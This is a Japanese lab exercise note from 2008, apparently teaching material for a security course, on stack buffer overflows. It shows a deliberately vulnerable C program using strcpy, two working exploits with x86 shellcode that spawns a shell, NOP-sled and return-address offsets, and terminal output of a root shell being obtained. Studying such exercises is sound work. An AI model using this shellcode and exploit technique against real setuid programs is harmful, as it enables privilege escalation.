defolos 2008-06-28

課題８.１

ーーーーー
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]){

    char buffer[800];
    strcpy(buffer, argv[1]);
    return 0;
}
ーーーーー

コンパイルしたものを/home/SAS_Workspace/ex8_bof.exeとして置いてる
今回はバッファ領域を８００バイト確保している(これは始め言わない)
基本的なロジックは前回と全く一緒

前回紹介した挿入ベクター生成プログラムではシェルが起動しないことを確認
各自で作ってもらったシェルコードを利用する

とりあえず,９００バイトの挿入ベクターでBOFが発生することを確認
NOPスレッドを４００バイトとれば権限を奪える

defolos@glazheim:~/ex8$ ./a.out
-------exploit---------------
sh-2.05b# exit
exit

戻りアドレスはex8_bof.exeのbuffer変数から８１２バイトの位置にある
ゆえに,８１７バイトの挿入ベクターを押し込めばOK
NOPスレッドは２９８バイトとれば,制御がシェルコードに移る

ーーーーー
#include <stdlib.h>

#define BUFFSIZE 817
#define NOPSIZE 298

char shellcode[]=
"\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

unsigned long sp (void){
    __asm__("movl %esp, %eax");
}

int main (int argc, char *argv[]){

    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("-------exploit---------------\n");

    buffer = malloc(BUFFSIZE);
    ptr = buffer;
    addr_ptr = (long *)ptr;
    for (i=0; i<BUFFSIZE; i += 4)
        *(addr_ptr++) = ret;

    for (i=0; i<NOPSIZE; i++)
        buffer[i] = '\x90';

    ptr = buffer + NOPSIZE;
    for (i=0; i<strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buffer[BUFFSIZE - 1] = 0;

    execl("/home/SAS_Workspace/ex8_bof.exe", "/home/SAS_Workspace/ex8_bof.exe", buffer, 0);

    free(buffer);
    return 0;
}

ーーーーー

○retという略記が分かりにくい。RET命令かと間違う。戻りアドレスとかにしたほうがいいかも。
○引数のスタックへの積まれ方。ARGCが先？ARGVが先？どっち？
○RET値の説明が分かりにくい
○EXECLでなく、EXECVを利用した方がわかりやすい

defolos@glazheim:~/ex8$ ./a.out
bffff848
bffff7d8
sh-2.05b$ exit
exit
defolos@glazheim:~/ex8$ vim ex8_exploit.c
defolos@glazheim:~/ex8$ cat ex8_exploit.c
#include <stdlib.h>

char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp (void){
       __asm__("movl %esp, %eax");
}

int main (int argc, char *argv[]){
     int i, offset;
     long esp, ret, *addr_ptr;
     char *buffer, *ptr;

     offset = 0;
     esp = sp();
    ret = esp - offset;


   printf("%x\n",ret);

    buffer = malloc(900);

   ptr = buffer;
   addr_ptr = (long *)ptr;
  for (i=0; i<900; i += 4){
           *(addr_ptr++) = ret;
   }

     for (i=0; i<400; i++){
            buffer[i]='\x90';
        }

     ptr = buffer + 400;
     for (i=0; i<strlen(shellcode); i++){
          *(ptr++) = shellcode[i];
       }

      buffer[900 - 1] = 0;

     char *argv[2];
     argv[0] = "./ex8_bof.exe";
     argv[1] = buffer;
     argv[2] = NULL;
     execve(argv[0], argv, NULL);

 //     execl("./ex8_bof.exe", "ex8_bof.exe", buffer, 0);

    free(buffer);
  return 0;
}